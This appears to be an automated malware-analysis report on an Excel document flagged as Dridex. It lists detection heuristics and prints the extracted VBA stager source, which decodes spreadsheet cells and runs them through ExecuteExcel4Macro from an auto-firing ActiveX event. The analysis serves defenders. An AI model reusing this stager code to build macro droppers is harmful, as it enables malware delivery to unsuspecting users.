MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The critical heuristics indicate that this OOXML document contains VBA macros that leverage ActiveX events to launch decoded Excel 4.0 macros. ClamAV detections confirm this is likely Ldridex malware. The VBA script contains functions for string manipulation and obfuscation, and the ExecuteExcel4Macro function is used to run the decoded macro, which is a common technique for downloading and executing further stages.
Heuristics 3
-
ClamAV: Xls.Malware.Ldridex-9768648-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Ldridex-9768648-0
-
VBA project inside OOXML medium 1 related finding OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGERVBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1751 bytes |
SHA-256: 242b0f8b54fd014e3adac835efae51c4f0f735f152287b786cbfc0c2b18d1143 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "test, 1, 0, MSForms, Frame"
Function mj(a1, a2, a3, a4, y As String)
mj = Replace(y, a1, a2): mj = Replace(mj, a3, a4)
End Function
Function sg()
Dim gt As String, f As Integer
g = 602: gg = 890
AA = Int((gg - g + 1) * Rnd + g)
For j = 1 To 4
If IsEmpty(Cells(AA, j)) = 0 Then
gt = Cells(AA, j)
f = j
Exit For
End If
Next
sg = vo(gt, f)
End Function
Sub deccof()
a = 9
End Sub
Function vo(aw As String, w As Integer) As String
Dim ww() As Byte
ww = StrConv(aw, vbFromUnicode)
For Each Q In ww
vo = vo & Chr(Q + w)
Next
End Function
Function SW(Length As Long) As Variant
Dim d As Long
For d = 1 To Length
SW = SW & [MID("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",RANDBETWEEN(1,62),1)]
Next
End Function
Private Sub test_Layout()
Dim hh As String
kk = SW(Int((8 - 6 + 1) * Rnd + 6))
d2 = SW(Int((8 - 6 + 1) * Rnd + 6))
d3 = SW(Int((8 - 6 + 1) * Rnd + 6))
For j = 223 To 227
Do
nm = vo(Cells(j, 1), Int((4 - 1 + 1) * Rnd + 1))
Loop Until Right(nm, 1) = ")"
hh = nm
ExecuteExcel4Macro (mj("$", d3, "X", sg, mj(";", kk, "'", d2, hh)))
nm = ""
Next
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 18432 bytes |
SHA-256: e64bed876cdee0cd382cbfb509de8c57e855e28d637eeac0d7aacfa08d6bc079 |
|||
|
Detection
ClamAV:
Xls.Malware.Ldridex-9768648-0
Obfuscation or payload:
unlikely
|
|||
emf_00.emf |
ooxml-emf | OOXML EMF part: xl/media/image1.emf | 2024 bytes |
SHA-256: 18442f66fc184308368fb113b1c28494dce7331a052469405fcf94f2ee8085b5 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.